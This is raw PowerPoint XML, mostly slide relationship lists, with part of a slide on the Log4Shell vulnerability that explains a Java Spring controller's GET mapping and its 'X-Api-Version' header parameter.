Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink72.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink59.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink67.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink54.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink62.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink70.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink52.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink65.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink51.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink73.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink14.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink60.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink68.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink55.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink17.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink49.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink63.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink58.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink94.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink107.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink115.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink129.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink81.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink89.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink102.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink110.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink124.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink118.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink84.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink97.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink105.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink113.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink79.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink92.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink127.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink100.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink108.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink121.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink76.xml"/><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87.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink91.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink126.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink78.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink95.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink99.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink103.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink112.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink116.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink120.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink82.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink90.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink98.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink111.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink125.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink119.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink74.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink85.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink93.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink106.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink128.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink114.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink80.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink88.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink101.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink123.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink77.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink109.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink122.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink96.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink83.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink104.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink117.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Log4Shell Vulnerability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F044EA3-0EAE-EC28-6AE2-70DFE343B998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="872679" y="2543385"/>
            <a:ext cx="9938825" cy="37246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342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>@GetMapping("/")</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>: A Java annotation that tells the web application that this method should handle HTTP GET requests when the URL path is "/". In other words, when someone accesses the root URL of the application (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Söhne"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>), this method will be executed.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Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>public String index(@RequestHeader("X-Api-Version") String </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Söhne"/>
              </a:rPr>
              <a:t>: This is a Java method that gets executed when a GET request is made to the root URL. It accepts a parameter named </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
                <a:ea typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
